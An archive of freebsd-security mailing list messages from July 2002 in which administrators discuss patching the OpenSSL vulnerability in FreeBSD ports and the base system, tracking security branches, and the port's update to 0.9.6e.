List-Unsubscribe: X-Loop: FreeBSD.org

For those not on bugtraq (you should be if you are not already) looks like there are a series of vulnerabilities for openssl.
More information:

---Mike
--------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400
Sentex Communications, mike@sentex.net
Providing Internet since 1994 www.sentex.net
Cambridge, Ontario Canada www.sentex.net/mike

From owner-freebsd-security Tue Jul 30 7:57:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8F17A37B405 for ; Tue, 30 Jul 2002 07:57:09 -0700 (PDT) Received: from mile.nevermind.kiev.ua (office.netstyle.com.ua [213.186.199.26]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6170643E42 for ; Tue, 30 Jul 2002 07:57:04 -0700 (PDT) (envelope-from never@mile.nevermind.kiev.ua) Received: from mile.nevermind.kiev.ua (never@localhost [127.0.0.1]) by mile.nevermind.kiev.ua (8.12.3/8.12.3) with ESMTP id g6UEuuKs017806; Tue, 30 Jul 2002 17:56:57 +0300 (EEST) (envelope-from never@mile.nevermind.kiev.ua) Received: (from never@localhost) by mile.nevermind.kiev.ua (8.12.3/8.12.3/Submit) id g6UEuupY017805; Tue, 30 Jul 2002 17:56:56 +0300 (EEST) Date: Tue, 30 Jul 2002 17:56:56 +0300 From: Alexandr Kovalenko To: Geir Råness Cc: freebsd-security@FreeBSD.ORG Subject: Re: About the openssl hole Message-ID: <20020730145656.GO12332@nevermind.kiev.ua> References: <004001c237cf$23c00560$fa00a8c0@elixor> Mime-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Disposition: inline In-Reply-To: <004001c237cf$23c00560$fa00a8c0@elixor> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Hello, Geir Råness!
On Tue, Jul 30, 2002 at 03:43:50PM +0200, you wrote:
[fix layout]
> Should we start to edit the openssl port (I have emailed the maintainer
> to update to 96.e, "or supply the patch from openssl" in the
> /usr/ports/security/openssl), or should we wait for a patch from the
> freebsd team?

We have OpenSSL in the base system, and that is what needs to be updated ASAP.

> If you look at bugtraq there are already rumours about exploits flying
> around now.
>
>
> Read the Advisory from openssl here
> http://www.openssl.org/news/secadv_20020730.txt

-- 
NEVE-RIPE
Ukrainian FreeBSD User Group
http://uafug.org.ua/

From owner-freebsd-security Tue Jul 30 8:21:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 19EB537B400 for ; Tue, 30 Jul 2002 08:21:14 -0700 (PDT) Received: from udmercy.edu (udmercy.edu [198.109.24.100]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7813043E4A for ; Tue, 30 Jul 2002 08:21:13 -0700 (PDT) (envelope-from allmenwf@udmercy.edu) Received: from [198.109.28.194] (account ) by udmercy.edu (CommuniGate Pro WebUser 3.1) with HTTP id 11249404 for ; Tue, 30 Jul 2002 11:21:12 -0400 From: William Allmendinger Subject: Security Branches To: freebsd-security@freebsd.org X-Mailer: CommuniGate Pro Web Mailer v.3.1 Date: Tue, 30 Jul 2002 11:21:12 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="ISO-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Please excuse what is possibly a very easy question. How does one find out what the latest security branch is for a particular release? In the advisory for resolv, it states to upgrade your system to the latest security branch, 4.5-RELEASE-p7.
How do I find out if this is the latest one to upgrade/install from? I can't move to 4.6 yet due to an issue with the boot loader and scsi, waiting for 6.1 to see if it has a fix. These are production systems and I need them as secure and stable as possible. Thanks.

________________________________________
William F. Allmendinger
Network Manager
University of Detroit Mercy

From owner-freebsd-security Tue Jul 30 8:25:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CCDCE37B400 for ; Tue, 30 Jul 2002 08:25:51 -0700 (PDT) Received: from spxgate.servplex.com (66-105-58-82.customer.algx.net [66.105.58.82]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2255643E31 for ; Tue, 30 Jul 2002 08:25:51 -0700 (PDT) (envelope-from peter@servplex.com) Received: from peter.servplex.com ([192.168.0.61]) by spxgate.servplex.com (8.11.6/8.11.1) with ESMTP id g6UFWcg27544 for ; Tue, 30 Jul 2002 10:32:38 -0500 (CDT) (envelope-from peter@servplex.com) Message-Id: <5.1.0.14.2.20020730102525.00a53ec0@mail.servplex.com> X-Sender: peter@mail.servplex.com X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Tue, 30 Jul 2002 10:25:49 -0500 To: freebsd-security@freebsd.org From: Peter Elsner Subject: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

subscribe peter@servplex.com

From owner-freebsd-security Tue Jul 30 8:46:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org
(Postfix) with ESMTP id 9A9D337B400; Tue, 30 Jul 2002 08:46:55 -0700 (PDT) Received: from mile.nevermind.kiev.ua (office.netstyle.com.ua [213.186.199.26]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9A04943E4A; Tue, 30 Jul 2002 08:46:52 -0700 (PDT) (envelope-from never@mile.nevermind.kiev.ua) Received: from mile.nevermind.kiev.ua (never@localhost [127.0.0.1]) by mile.nevermind.kiev.ua (8.12.3/8.12.3) with ESMTP id g6UFkkKs018560; Tue, 30 Jul 2002 18:46:47 +0300 (EEST) (envelope-from never@mile.nevermind.kiev.ua) Received: (from never@localhost) by mile.nevermind.kiev.ua (8.12.3/8.12.3/Submit) id g6UFkk6J018559; Tue, 30 Jul 2002 18:46:46 +0300 (EEST) Date: Tue, 30 Jul 2002 18:46:46 +0300 From: Alexandr Kovalenko To: William Allmendinger Cc: freebsd-questions@FreeBSD.org Subject: Re: Security Branches Message-ID: <20020730154646.GP12332@nevermind.kiev.ua> References: Mime-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Hello, William Allmendinger!

On Tue, Jul 30, 2002 at 11:21:12AM -0400, you wrote:
> Please excuse what is possibly a very easy question. How
> does one find out what the latest security branch is for a
> particular release? In the advisory for resolv, it states to
> upgrade your system to the latest security branch,
> 4.5-RELEASE-p7. How do I find out if this is the latest one
> to upgrade/install from? I can't move to 4.6 yet due to an
> issue with the boot loader and scsi, waiting for 6.1 to see
> if it has a fix. These are production systems and I need
> them as secure and stable as possible. Thanks.

Just track the RELENG_4_5 branch.

P.S. Moving to freebsd-questions as it is FAQ.
-- 
NEVE-RIPE
Ukrainian FreeBSD User Group
http://uafug.org.ua/

From owner-freebsd-security Tue Jul 30 9:16:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6CC2D37B400 for ; Tue, 30 Jul 2002 09:16:26 -0700 (PDT) Received: from iota.root-servers.ch (iota.root-servers.ch [193.41.193.195]) by mx1.FreeBSD.org (Postfix) with SMTP id 1842D43E4A for ; Tue, 30 Jul 2002 09:16:25 -0700 (PDT) (envelope-from gaml@buz.ch) Received: (qmail 9902 invoked from network); 30 Jul 2002 16:16:24 -0000 Received: from dclient217-162-128-229.hispeed.ch (HELO gaxp1800) (217.162.128.229) by 0 with SMTP; 30 Jul 2002 16:16:24 -0000 Date: Tue, 30 Jul 2002 18:16:57 +0200 From: Gabriel Ambuehl X-Mailer: The Bat! (v1.60q) Educational Reply-To: Gabriel Ambuehl X-Priority: 3 (Normal) Message-ID: <170112657687.20020730181657@buz.ch> To: =?ISO-8859-1?B?R2VpciBS5W5lc3M=?= Cc: freebsd-security@freebsd.org Subject: Re: About the openssl hole In-Reply-To: <004001c237cf$23c00560$fa00a8c0@elixor> References: <004001c237cf$23c00560$fa00a8c0@elixor> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

You wrote:
GR> Should we start to edit the openssl port (I have emailed the maintainer to update to 96.e,
GR> "or supply the patch from openssl" in the /usr/ports/security/openssl), or should
GR> we wait for a patch from the freebsd team?

Do you think you could publish the 0.9.6e port somewhere until it gets integrated into CVS?

I think a lot of people could possibly use it...
From owner-freebsd-security Tue Jul 30 9:21:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CBD8037B401 for ; Tue, 30 Jul 2002 09:21:36 -0700 (PDT) Received: from iota.root-servers.ch (iota.root-servers.ch [193.41.193.195]) by mx1.FreeBSD.org (Postfix) with SMTP id 6360543E6E for ; Tue, 30 Jul 2002 09:21:35 -0700 (PDT) (envelope-from gaml@buz.ch) Received: (qmail 10043 invoked from network); 30 Jul 2002 16:21:34 -0000 Received: from dclient217-162-128-229.hispeed.ch (HELO gaxp1800) (217.162.128.229) by 0 with SMTP; 30 Jul 2002 16:21:34 -0000 Date: Tue, 30 Jul 2002 18:22:07 +0200 From: Gabriel Ambuehl X-Mailer: The Bat! (v1.60q) Educational Reply-To: Gabriel Ambuehl X-Priority: 3 (Normal) Message-ID: <137112967828.20020730182207@buz.ch> To: William Allmendinger Cc: freebsd-security@freebsd.org Subject: Re: Security Branches In-Reply-To: References: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

You wrote:
WA> Please excuse what is possibly a very easy question. How
WA> does one find out what the latest security branch is for a
WA> particular release? In the advisory for resolv, it states to
WA> upgrade your system to the latest security branch,
WA> 4.5-RELEASE-p7. How do I find out if this is the latest one
WA> to upgrade/install from? I can't move to 4.6 yet due to an
WA> issue with the boot loader and scsi, waiting for 6.1 to see
WA> if it has a fix. These are production systems and I need
WA> them as secure and stable as possible. Thanks.
If you don't want to move to 4.6 (which I'd highly recommend if you see any chance to get it running), you should cvsup to RELENG_4_5, which is the 4.5-RELEASE + security patches branch.

From owner-freebsd-security Tue Jul 30 9:23:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AA31F37B400 for ; Tue, 30 Jul 2002 09:23:19 -0700 (PDT) Received: from iota.root-servers.ch (iota.root-servers.ch [193.41.193.195]) by mx1.FreeBSD.org (Postfix) with SMTP id 4E52943E31 for ; Tue, 30 Jul 2002 09:23:18 -0700 (PDT) (envelope-from gaml@buz.ch) Received: (qmail 10100 invoked from network); 30 Jul 2002 16:23:17 -0000 Received: from dclient217-162-128-229.hispeed.ch (HELO gaxp1800) (217.162.128.229) by 0 with SMTP; 30 Jul 2002 16:23:17 -0000 Date: Tue, 30 Jul 2002 18:23:50 +0200 From: Gabriel Ambuehl X-Mailer: The Bat! (v1.60q) Educational Reply-To: Gabriel Ambuehl X-Priority: 3 (Normal) Message-ID: <189113070812.20020730182350@buz.ch> To: Jeff Palmer Cc: Hendrik Scholz , freebsd-security@freebsd.org Subject: Re[2]: audit-packages like program for FreeBSD? In-Reply-To: <5.1.1.6.0.20020729212013.00a03140@mail.drkshdw.org> References: <5.1.1.6.0.20020729212013.00a03140@mail.drkshdw.org> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Hi Jeff Palmer, you wrote.
JP> pkg_version -c works for me
JP> If all your ports are updated as needed, security issues are fixed as the
JP> portstree is updated ;-)

I'd recommend checking out sysutils/portupgrade which does a really great job keeping our systems current.
Now if we only already had a patched openssl port...

Regards,
Gabriel

From owner-freebsd-security Tue Jul 30 9:27:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 73CB537B400 for ; Tue, 30 Jul 2002 09:27:10 -0700 (PDT) Received: from mail46.fg.online.no (mail46-s.fg.online.no [148.122.161.46]) by mx1.FreeBSD.org (Postfix) with ESMTP id DB99C43E31 for ; Tue, 30 Jul 2002 09:27:08 -0700 (PDT) (envelope-from pulz@pulz.no) Received: from elixor (ti500720a080-0896.bb.online.no [80.213.75.128]) by mail46.fg.online.no (8.9.3/8.9.3) with SMTP id SAA08528; Tue, 30 Jul 2002 18:26:56 +0200 (MET DST) Message-ID: <000d01c237e5$ceede1d0$fa00a8c0@elixor> From: =?iso-8859-1?Q?Geir_R=E5ness?= To: "Gabriel Ambuehl" Cc: References: <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> Subject: Re: About the openssl hole Date: Tue, 30 Jul 2002 18:26:05 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

I can't do that, but you could easily edit the old port yourself and fix it that way.

I can't promise you that this will work, but you could change the PORTVERSION= 0.9.6d to PORTVERSION= 0.9.6e and change the distinfo... But then we get the problem with the patches that are included in the port, that would probably fail on you..

It's your own choice what to do; if you want to risk it, do so.
If not, wait for the freebsd team to make a patch for us.

If you take a quick look at the current branch you will see that the openssl is changed to 0.9.6.e, but as we know, the current branch ain't so stable. So the best thing is probably to wait.

Best Regards
Geir Råness

----- Original Message -----
From: "Gabriel Ambuehl"
To: "Geir Råness"
Cc:
Sent: Tuesday, July 30, 2002 6:16 PM
Subject: Re: About the openssl hole

> You wrote:
>
> GR> Should we start to edit the openssl port (I have emailed the maintainer to update to 96.e,
> GR> "or supply the patch from openssl" in the /usr/ports/security/openssl), or should
> GR> we wait for a patch from the freebsd team?
>
> Do you think you could publish the 0.9.6e port somewhere until it gets
> integrated into CVS?
>
> I think a lot of people could possibly use it...

From owner-freebsd-security Tue Jul 30 9:36:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8586E37B400 for ; Tue, 30 Jul 2002 09:36:33 -0700 (PDT) Received: from iota.root-servers.ch (iota.root-servers.ch [193.41.193.195]) by mx1.FreeBSD.org (Postfix) with SMTP id E8F9E43E31 for ; Tue, 30 Jul 2002 09:36:31 -0700 (PDT) (envelope-from gabriel_ambuehl@buz.ch) Received: (qmail 10467 invoked from network); 30 Jul 2002 16:36:30 -0000 Received: from dclient217-162-128-229.hispeed.ch (HELO gaxp1800) (217.162.128.229) by 0 with SMTP; 30 Jul 2002 16:36:30 -0000 Date: Tue, 30 Jul 2002 18:37:01 +0200 From: Gabriel Ambuehl X-Mailer: The Bat!
(v1.60q) Educational Reply-To: gabriel_ambuehl@buz.ch Organization: BUZ Internet Services X-Priority: 3 (Normal) Message-ID: <5113861671.20020730183701@buz.ch> To: =?ISO-8859-1?B?R2VpciBS5W5lc3M=?= Cc: freebsd-security@freebsd.org Subject: Re[2]: About the openssl hole In-Reply-To: <000d01c237e5$ceede1d0$fa00a8c0@elixor> References: <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> <000d01c237e5$ceede1d0$fa00a8c0@elixor> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

Hello Geir,

Tuesday, July 30, 2002, 6:26:05 PM, you wrote:
> I can't do that, but you could easily edit the old port yourself and fix it that way.

Well I tried to do that... It's just that openssl.org is practically down (you know what I mean...) and thus I was pretty much out of luck.

> It's your own choice what to do; if you want to risk it, do so.

I would have risked it (in any case, it's still better to kill SSL services myself trying to defend from the blackhats than having the blackhats destroying everything...)

> If not, wait for the freebsd team to make a patch for us.

That's more or less what I'm doing now.

> If you take a quick look at the current branch you will see that
> the openssl is changed to 0.9.6.e, but as we know, the current branch ain't so stable.

I'll have another shot at current once the TrustedBSD stuff is in, because I really want to have ACLs ASAP, but running it in production is entirely out of the question right now.
Best regards,
Gabriel

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0.2i

iQEVAwUBPUayoMZa2WpymlDxAQHS2wf9GgUFkA3eI2rSJlKYynsnzisode50bYdW
TINnOJW/8mYYUBTiIXDLYZ6Xt+ZZhu+0LzlCQcu9XvgHnxsabDztUYAdGt/XCmde
BAUysjmfoRR9FlUEjK9brovds/LKiKODoBSmN2LUSnPDUm0V0ojJbezfQPiRIEmc
yHa4cKxWJoMq4gRNRTOCLr2rwVe78rbK1xw3ICe+Z0cDUzJX8VzZijKfzY39aZ9L
OPSMdLQ0cJf1ASsJRthNRqzHc299oVdNbRoFia1AR9p1fpaN2u/0qu/9GxQQtYKY
T4z17Enao5A8Htf2tJcWZ1/+AXkJ639/gsYUflfV7HgLruEKAwIYoA==
=nLA8
-----END PGP SIGNATURE-----

From owner-freebsd-security Tue Jul 30 9:38:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1A87C37B400 for ; Tue, 30 Jul 2002 09:38:53 -0700 (PDT) Received: from earth.hal.rcast.u-tokyo.ac.jp (earth.hal.rcast.u-tokyo.ac.jp [157.82.80.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0CD9243E3B for ; Tue, 30 Jul 2002 09:38:52 -0700 (PDT) (envelope-from konno@hal.rcast.u-tokyo.ac.jp) Received: from [192.168.1.8] (FLA9Aaa001.chb.mesh.ad.jp [61.193.68.129]) by earth.hal.rcast.u-tokyo.ac.jp (8.9.3/3.7W) with ESMTP id BAA12875; Wed, 31 Jul 2002 01:38:50 +0900 (JST) Date: Wed, 31 Jul 2002 01:38:48 +0900 From: Shunichi Konno To: freebsd-security@freebsd.org Subject: Re: About the openssl hole In-Reply-To: <170112657687.20020730181657@buz.ch> References: <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> Message-Id: <20020731012456.98C7.KONNO@hal.rcast.u-tokyo.ac.jp> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Mailer: Becky! ver.
2.05.03 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Hi,

On Tue, 30 Jul 2002 18:16:57 +0200 Gabriel Ambuehl wrote:
GA> Do you think you could publish the 0.9.6e port somewhere until it gets
GA> integrated into CVS?

I fetched http://www.openssl.org/news/patch_20020730_0_9_6d.txt and renamed it to /usr/ports/security/openssl/files/patch-aa. After that, I did "make install" in /usr/ports/security/openssl. I successfully compiled and installed *patched* openssl-0.9.6d.

Is that okay?

----------
KONNO Shunichi

From owner-freebsd-security Tue Jul 30 9:57:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1011C37B400 for ; Tue, 30 Jul 2002 09:57:09 -0700 (PDT) Received: from mail45.fg.online.no (mail45-s.fg.online.no [148.122.161.45]) by mx1.FreeBSD.org (Postfix) with ESMTP id DED4C43E5E for ; Tue, 30 Jul 2002 09:57:07 -0700 (PDT) (envelope-from pulz@pulz.no) Received: from elixor (ti500720a080-0896.bb.online.no [80.213.75.128]) by mail45.fg.online.no (8.9.3/8.9.3) with SMTP id SAA19921; Tue, 30 Jul 2002 18:57:03 +0200 (MET DST) Message-ID: <002301c237ea$04b4d4f0$fa00a8c0@elixor> From: =?iso-8859-1?Q?Geir_R=E5ness?= To: Cc: References: <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> <000d01c237e5$ceede1d0$fa00a8c0@elixor> <5113861671.20020730183701@buz.ch> Subject: Re: Re[2]: About the openssl hole Date: Tue, 30 Jul 2002 18:56:12 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

I talked with a friend of mine who tried this solution, and he told me that it was only one patch that failed. If you remove the patch "patch-ah" the build will go fine.

But as many know, the port of openssl will not completely replace the core openssl. (You could see this if you build mod_ssl.) So the best thing is to wait for an official patch.

Best Regards
Geir Råness

----- Original Message -----
From: "Gabriel Ambuehl"
To: "Geir Råness"
Cc:
Sent: Tuesday, July 30, 2002 6:37 PM
Subject: Re[2]: About the openssl hole

> -----BEGIN PGP SIGNED MESSAGE-----
>
> Hello Geir,
>
> Tuesday, July 30, 2002, 6:26:05 PM, you wrote:
>
> > I can't do that, but you could easily edit the old port yourself and
> fix it that way.
>
> Well I tried to do that... It's just that openssl.org is practically
> down (you know what I mean...) and thus I was pretty much out of luck
>
> > It's your own choice what to do; if you want to risk it, do so.
>
> I would have risked it (in any case, it's still better to kill SSL
> services myself trying to defend from the blackhats than having the
> blackhats destroying everything...)
>
> > If not, wait for the freebsd team to make a patch for us.
>
> That's more or less what I'm doing now.
>
> > If you take a quick look at the current branch you will see that
> > the openssl is changed to 0.9.6.e, but as we know, the current branch
> ain't so stable.
>
> I'll have another shot at current once the TrustedBSD stuff is in
> because I really want to have ACLs ASAP, but running it in production is
> entirely out of the question right now.
>
>
>
> Best regards,
> Gabriel
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGP 6.0.2i
>
> iQEVAwUBPUayoMZa2WpymlDxAQHS2wf9GgUFkA3eI2rSJlKYynsnzisode50bYdW
> TINnOJW/8mYYUBTiIXDLYZ6Xt+ZZhu+0LzlCQcu9XvgHnxsabDztUYAdGt/XCmde
> BAUysjmfoRR9FlUEjK9brovds/LKiKODoBSmN2LUSnPDUm0V0ojJbezfQPiRIEmc
> yHa4cKxWJoMq4gRNRTOCLr2rwVe78rbK1xw3ICe+Z0cDUzJX8VzZijKfzY39aZ9L
> OPSMdLQ0cJf1ASsJRthNRqzHc299oVdNbRoFia1AR9p1fpaN2u/0qu/9GxQQtYKY
> T4z17Enao5A8Htf2tJcWZ1/+AXkJ639/gsYUflfV7HgLruEKAwIYoA==
> =nLA8
> -----END PGP SIGNATURE-----

From owner-freebsd-security Tue Jul 30 10: 4:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 212DF37B400 for ; Tue, 30 Jul 2002 10:04:10 -0700 (PDT) Received: from iota.root-servers.ch (iota.root-servers.ch [193.41.193.195]) by mx1.FreeBSD.org (Postfix) with SMTP id D49FB43E31 for ; Tue, 30 Jul 2002 10:04:08 -0700 (PDT) (envelope-from gaml@buz.ch) Received: (qmail 11331 invoked from network); 30 Jul 2002 17:04:07 -0000 Received: from dclient217-162-128-229.hispeed.ch (HELO gaxp1800) (217.162.128.229) by 0 with SMTP; 30 Jul 2002 17:04:07 -0000 Date: Tue, 30 Jul 2002 19:04:34 +0200 From: Gabriel Ambuehl X-Mailer: The Bat!
(v1.60q) Educational Reply-To: gabriel_ambuehl@buz.ch Organization: BUZ Internet Services X-Priority: 3 (Normal) Message-ID: <2115515250.20020730190434@buz.ch> To: =?ISO-8859-1?B?R2VpciBS5W5lc3M=?= Cc: freebsd-security@freebsd.org Subject: Re[4]: About the openssl hole In-Reply-To: <002301c237ea$04b4d4f0$fa00a8c0@elixor> References: <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> <000d01c237e5$ceede1d0$fa00a8c0@elixor> <5113861671.20020730183701@buz.ch> <002301c237ea$04b4d4f0$fa00a8c0@elixor> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

Hello Geir,

Tuesday, July 30, 2002, 6:56:12 PM, you wrote:
> I talked with a friend of mine who tried this solution, and he told me that it was only one patch that failed.
> If you remove the patch "patch-ah" the build will go fine.
> But as many know, the port of openssl will not completely replace the core openssl.
> (You could see this if you build mod_ssl.)

Well, I could live without mod_ssl for the next hours, but I can't just go shut down ssh on all boxes because that would mean I'd have to go onsite to some 4 NOCs (two of them on the other side of the world) to get SSH back up. Hmm. Maybe I'll just shut all SSL stuff down and have the NOC monkeys reboot them when the patch is here....

What's happening (I suppose) is that the port gets installed to /usr/local/lib whereas the old version is still in /usr/lib, where it belongs as part of the base system, which means that you probably have to overwrite the old lib by hand, but I wouldn't want to guarantee that nothing is going to break if you do this.
To make it short: it's probably best to just wait and update your boxes
ASAP (I'm just glad I just got a bunch of Athlon XP 1800+ boxes which do
make world in no time ;-).

Best regards,
Gabriel

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0.2i
-----END PGP SIGNATURE-----

From owner-freebsd-security Tue Jul 30 10:56: 1 2002
Message-Id: <5.1.1.6.2.20020730125503.047d8480@localhost>
Date: Tue, 30 Jul 2002 12:55:28 -0500
To: freebsd-security@freebsd.org
From: Christopher Schulte
Subject: Fwd: cvs commit: ports/security/openssl Makefile distinfo ports/security/openssl/files patch-ah
Content-Type: text/plain; charset="us-ascii"; format=flowed
>dinoex      2002/07/30 10:38:18 PDT
>
>  Modified files:
>    security/openssl     Makefile distinfo
>  Removed files:
>    security/openssl/files patch-ah
>  Log:
>  Security Update to 0.9.6e
>
>  Revision  Changes    Path
>  1.62      +5 -4      ports/security/openssl/Makefile
>  1.22      +1 -1      ports/security/openssl/distinfo
>  1.6       +0 -53     ports/security/openssl/files/patch-ah (dead)
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe cvs-all" in the body of the message

--
Christopher Schulte
http://www.schulte.org/
Do not un-munge my @nospam.schulte.org email address.
This address is valid.

From owner-freebsd-security Tue Jul 30 11: 5:38 2002
To: freebsd-security@FreeBSD.ORG
From: dirk.meyer@dinoex.sub.org (Dirk Meyer)
Subject:
 Re: About the openssl hole
Date: Tue, 30 Jul 2002 19:52:54 +0200
References: <004001c237cf$23c00560$fa00a8c0@elixor> <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch>

Gabriel Ambuehl wrote:
> Do you think you could publish the 0.9.6e port somewhere until it gets
> integrated into CVS?
>
> I think a lot of people could possibly use it...

sure ... I just committed it, so you can rebuild apache13-modssl with it.
to update other ports: see PR: ports/36080 and ports/39054

All other ports can include:

.if defined( USE_SSL )
.include "${PORTSDIR}/security/openssl/Makefile.ssl"
.endif

kind regards Dirk

- Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany -
[dirk.meyer@dinoex.sub.org],[dirk.meyer@guug.de],[dinoex@FreeBSD.org]

From owner-freebsd-security Tue Jul 30 11: 5:50 2002
To: freebsd-security@FreeBSD.ORG
From: dirk.meyer@dinoex.sub.org (Dirk Meyer)
Subject: Re: About the openssl hole
Date: Tue, 30 Jul 2002 19:52:54 +0200
References: <170112657687.20020730181657@buz.ch> <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> <20020731012456.98C7.KONNO@hal.rcast.u-tokyo.ac.jp>

Shunichi Konno wrote:
> I fetched http://www.openssl.org/news/patch_20020730_0_9_6d.txt and
> renamed it to /usr/ports/security/openssl/files/patch-aa.
> After that, I did "make install" in /usr/ports/security/openssl.
> I successfully compiled and installed *patched* openssl-0.9.6d.
>
> Is that okay?

Yes this will work fine...
But beware of apps that are linked to the lib in the base system.
